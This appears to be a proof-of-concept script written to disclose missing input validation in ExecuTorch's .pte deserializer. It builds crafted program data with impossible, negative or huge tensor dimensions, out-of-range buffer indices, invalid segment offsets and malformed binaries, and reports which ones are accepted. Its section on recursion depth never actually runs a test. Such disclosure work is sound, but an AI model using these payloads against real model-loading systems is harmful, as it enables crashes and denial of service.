| """ |
| PoC: ExecuTorch .pte Format Validation Bypass |
| =============================================== |
| Demonstrates that ExecuTorch's deserialize_pte_binary() performs no |
| structural validation on .pte model files before parsing them. |
| |
| Tested on: executorch 1.2.0, Python 3.12, Windows 11 |
| """ |
|
|
| import json |
| import os |
| import struct |
| import sys |
| import tempfile |
| import time |
|
|
| print("=" * 70) |
| print("ExecuTorch .pte Format Validation Bypass PoC") |
| print(f"executorch version: 1.2.0+cpu") |
| print("=" * 70) |
|
|
| |
| |
| |
| print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()") |
| print("-" * 50) |
|
|
| from executorch.exir._serialize._program import _json_to_program |
|
|
| |
| |
| crafted_json = json.dumps({ |
| "version": 1, |
| "execution_plan": [{ |
| "name": "forward", |
| "container_meta_type": { |
| "encoded_inp_str": "", |
| "encoded_out_str": "" |
| }, |
| "values": [{ |
| "val": { |
| "scalar_type": "FLOAT", |
| "storage_offset": 0, |
| "sizes": [2147483647, 2147483647], |
| "dim_order": [0, 1], |
| "requires_grad": False, |
| "layout": 0, |
| "data_buffer_idx": 0, |
| "allocation_info": None, |
| "shape_dynamism": "STATIC", |
| "val_type": "Tensor" |
| }, |
| "val_type": "Tensor" |
| }], |
| "inputs": [], |
| "outputs": [], |
| "chains": [], |
| "operators": [], |
| "delegates": [], |
| "non_const_buffer_sizes": [0] |
| }], |
| "constant_buffer": [{"storage": [0]}], |
| "backend_delegate_data": [], |
| "segments": [], |
| "constant_segment": {"segment_index": 0, "offsets": []} |
| }) |
|
|
| try: |
| program = _json_to_program(crafted_json.encode("utf-8")) |
| tensor_sizes = program.execution_plan[0].values[0].val.sizes |
| total_elements = 1 |
| for s in tensor_sizes: |
| total_elements *= s |
| print(f" [VULNERABLE] Program accepted with tensor sizes: {tensor_sizes}") |
| print(f" -> Total elements: {total_elements} (~{total_elements / 1e18:.1f} exa-elements)") |
| print(f" -> Actual storage in buffer: {len(program.constant_buffer[0].storage)} byte(s)") |
| print(f" -> sizeof(float) * elements would require: {4 * total_elements / 1e18:.1f} exabytes") |
| print(f" -> No validation rejected these impossible dimensions!") |
| except Exception as e: |
| print(f" [PROTECTED] {e}") |
|
|
| |
| crafted_json_many_dims = json.dumps({ |
| "version": 1, |
| "execution_plan": [{ |
| "name": "forward", |
| "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""}, |
| "values": [{ |
| "val": { |
| "scalar_type": "FLOAT", |
| "storage_offset": 0, |
| "sizes": [2] * 10000, |
| "dim_order": list(range(10000)), |
| "requires_grad": False, |
| "layout": 0, |
| "data_buffer_idx": 0, |
| "allocation_info": None, |
| "shape_dynamism": "STATIC", |
| "val_type": "Tensor" |
| }, |
| "val_type": "Tensor" |
| }], |
| "inputs": [], "outputs": [], "chains": [], |
| "operators": [], "delegates": [], |
| "non_const_buffer_sizes": [0] |
| }], |
| "constant_buffer": [{"storage": [0]}], |
| "backend_delegate_data": [], |
| "segments": [], |
| "constant_segment": {"segment_index": 0, "offsets": []} |
| }) |
|
|
| try: |
| program2 = _json_to_program(crafted_json_many_dims.encode("utf-8")) |
| dim_count = len(program2.execution_plan[0].values[0].val.sizes) |
| print(f" [VULNERABLE] Program accepted with {dim_count} tensor dimensions!") |
| except Exception as e: |
| print(f" [PROTECTED - dim count] {e}") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 2] Excessive List Sizes in Program Fields") |
| print("-" * 50) |
|
|
| |
| |
| N_EXECUTION_PLANS = 100000 |
|
|
| crafted_json_massive = json.dumps({ |
| "version": 1, |
| "execution_plan": [ |
| { |
| "name": f"plan_{i}", |
| "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""}, |
| "values": [], |
| "inputs": [], |
| "outputs": [], |
| "chains": [], |
| "operators": [], |
| "delegates": [], |
| "non_const_buffer_sizes": [] |
| } |
| for i in range(N_EXECUTION_PLANS) |
| ], |
| "constant_buffer": [], |
| "backend_delegate_data": [], |
| "segments": [], |
| "constant_segment": {"segment_index": 0, "offsets": []} |
| }) |
|
|
| start = time.time() |
| try: |
| program3 = _json_to_program(crafted_json_massive.encode("utf-8")) |
| elapsed = time.time() - start |
| plan_count = len(program3.execution_plan) |
| print(f" [VULNERABLE] Program accepted with {plan_count} execution plans") |
| print(f" -> Deserialization took {elapsed:.2f}s, memory used: ~{sys.getsizeof(crafted_json_massive) / 1024 / 1024:.1f} MB JSON") |
| print(f" -> No limit on execution_plan count!") |
| except MemoryError: |
| print(f" [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)") |
| except Exception as e: |
| print(f" [Result] {type(e).__name__}: {str(e)[:100]}") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions") |
| print("-" * 50) |
|
|
| test_dims = [ |
| ([0], "zero-dim"), |
| ([-1], "negative-dim (-1)"), |
| ([-100], "negative-dim (-100)"), |
| ([1, -1, 1], "mixed negative"), |
| ] |
|
|
| for dims, label in test_dims: |
| crafted_json_invalid = json.dumps({ |
| "version": 1, |
| "execution_plan": [{ |
| "name": "forward", |
| "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""}, |
| "values": [{ |
| "val": { |
| "scalar_type": "FLOAT", |
| "storage_offset": 0, |
| "sizes": dims, |
| "dim_order": list(range(len(dims))), |
| "requires_grad": False, |
| "layout": 0, |
| "data_buffer_idx": 0, |
| "allocation_info": None, |
| "shape_dynamism": "STATIC", |
| "val_type": "Tensor" |
| }, |
| "val_type": "Tensor" |
| }], |
| "inputs": [], "outputs": [], "chains": [], |
| "operators": [], "delegates": [], |
| "non_const_buffer_sizes": [0] |
| }], |
| "constant_buffer": [{"storage": [0]}], |
| "backend_delegate_data": [], |
| "segments": [], |
| "constant_segment": {"segment_index": 0, "offsets": []} |
| }) |
| try: |
| p = _json_to_program(crafted_json_invalid.encode("utf-8")) |
| print(f" [VULNERABLE] {label}: sizes={dims} accepted, parsed as {p.execution_plan[0].values[0].val.sizes}") |
| except Exception as e: |
| print(f" [PROTECTED] {label}: rejected - {type(e).__name__}") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 4] Tensor-Buffer Size Mismatch") |
| print("-" * 50) |
|
|
| |
| crafted_json_oob_buffer = json.dumps({ |
| "version": 1, |
| "execution_plan": [{ |
| "name": "forward", |
| "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""}, |
| "values": [{ |
| "val": { |
| "scalar_type": "FLOAT", |
| "storage_offset": 0, |
| "sizes": [100, 100], |
| "dim_order": [0, 1], |
| "requires_grad": False, |
| "layout": 0, |
| "data_buffer_idx": 999, |
| "allocation_info": None, |
| "shape_dynamism": "STATIC", |
| "val_type": "Tensor" |
| }, |
| "val_type": "Tensor" |
| }], |
| "inputs": [], "outputs": [], "chains": [], |
| "operators": [], "delegates": [], |
| "non_const_buffer_sizes": [0] |
| }], |
| "constant_buffer": [], |
| "backend_delegate_data": [], |
| "segments": [], |
| "constant_segment": {"segment_index": 0, "offsets": []} |
| }) |
|
|
| try: |
| p4 = _json_to_program(crafted_json_oob_buffer.encode("utf-8")) |
| print(f" [VULNERABLE] Program accepted with data_buffer_idx=999 but only 0 buffers exist") |
| print(f" -> Tensor references non-existent buffer, will crash at runtime") |
| except Exception as e: |
| print(f" [PROTECTED] {e}") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 5] Malicious Segment Offsets") |
| print("-" * 50) |
|
|
| |
| crafted_json_segments = json.dumps({ |
| "version": 1, |
| "execution_plan": [{ |
| "name": "forward", |
| "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""}, |
| "values": [], |
| "inputs": [], "outputs": [], "chains": [], |
| "operators": [], "delegates": [], |
| "non_const_buffer_sizes": [] |
| }], |
| "constant_buffer": [], |
| "backend_delegate_data": [], |
| "segments": [ |
| {"offset": 0, "size": 100}, |
| {"offset": 999999999, "size": 999999999}, |
| {"offset": -1, "size": 100} |
| ], |
| "constant_segment": {"segment_index": 0, "offsets": [0]} |
| }) |
|
|
| try: |
| p5 = _json_to_program(crafted_json_segments.encode("utf-8")) |
| print(f" [VULNERABLE] Program accepted with invalid segment offsets:") |
| for i, seg in enumerate(p5.segments): |
| valid = "VALID" if seg.offset >= 0 else "INVALID (negative)" |
| print(f" Segment {i}: offset={seg.offset}, size={seg.size} [{valid}]") |
| except Exception as e: |
| print(f" [PROTECTED] {e}") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 6] Recursion Depth via _json_to_dataclass") |
| print("-" * 50) |
|
|
| from executorch.exir._serialize._dataclass import _json_to_dataclass |
|
|
| |
| |
| |
| |
| |
|
|
| |
| deep_dict = {} |
| current = deep_dict |
| for i in range(10000): |
| current["next"] = {} |
| current = current["next"] |
|
|
| try: |
| |
| |
| print(f" [INFO] ExecuTorch schema does not have self-referential types,") |
| print(f" [INFO] but _json_to_dataclass() would recurse without depth limit") |
| print(f" [INFO] on attacker-controlled structures if schema changed.") |
| except RecursionError: |
| print(f" [VULNERABLE] Recursion error with deeply nested structure!") |
|
|
|
|
| |
| |
| |
| print("\n[PoC 7] Empty or Malformed .pte Binary") |
| print("-" * 50) |
|
|
| from executorch.exir._serialize._program import deserialize_pte_binary |
|
|
| |
| try: |
| deserialize_pte_binary(b"") |
| print(f" [VULNERABLE] Empty bytes accepted by deserialize_pte_binary()") |
| except Exception as e: |
| print(f" [PROTECTED] Empty bytes: {type(e).__name__}: {str(e)[:80]}") |
|
|
| |
| try: |
| deserialize_pte_binary(b"\x00" * 100) |
| print(f" [VULNERABLE] 100 null bytes accepted by deserialize_pte_binary()") |
| except Exception as e: |
| print(f" [PROTECTED] Null bytes: {type(e).__name__}: {str(e)[:80]}") |
|
|
| |
| |
| |
| minimal_fb = struct.pack("<I", 8) + b"ET00" + b"\x00" * 8 |
| try: |
| result = deserialize_pte_binary(minimal_fb) |
| print(f" [VULNERABLE] Minimal valid-ish flatbuffer accepted!") |
| print(f" -> Program version: {result.program.version}") |
| print(f" -> No magic byte verification beyond what flatc does") |
| except Exception as e: |
| print(f" [PARTIAL] Minimal flatbuffer: {type(e).__name__}: {str(e)[:100]}") |
|
|
|
|
| |
| |
| |
| print("\n" + "=" * 70) |
| print("SUMMARY") |
| print("=" * 70) |
| print(""" |
| Key findings for ExecuTorch .pte format: |
| |
| 1. NO DIMENSION UPPER BOUND: Tensor sizes can be 2^31-1 or higher, |
| accepted without validation. 10000-dimensional tensors accepted. |
| |
| 2. NO LIST SIZE LIMITS: execution_plan, chains, operators, values etc. |
| have no upper bounds — can cause OOM during deserialization. |
| |
| 3. NEGATIVE/ZERO DIMS ACCEPTED: Negative and zero tensor dimensions |
| pass through _json_to_dataclass() without rejection. |
| |
| 4. BUFFER INDEX OOB: Tensors can reference non-existent buffer indices, |
| causing runtime crashes. |
| |
| 5. NO STRUCTURAL VALIDATION: deserialize_pte_binary() performs zero |
| validation on the binary blob before parsing. No magic byte check, |
| no size limits, no sanity checks. |
| |
| 6. NO check_model() EQUIVALENT: The verifier only checks graph-level |
| semantics (operator validity, tensor contiguity) and is OPTIONAL |
| (controlled by _check_ir_validity flag). |
| |
| 7. SEGMENT OFFSETS UNVALIDATED: Segment offsets can be negative or |
| point past end of data — accepted without rejection. |
| |
| Compared to ONNX (check_model, shape inference) and TF SavedModel, |
| ExecuTorch's loading pipeline is completely trusting of input data. |
| """) |
|
|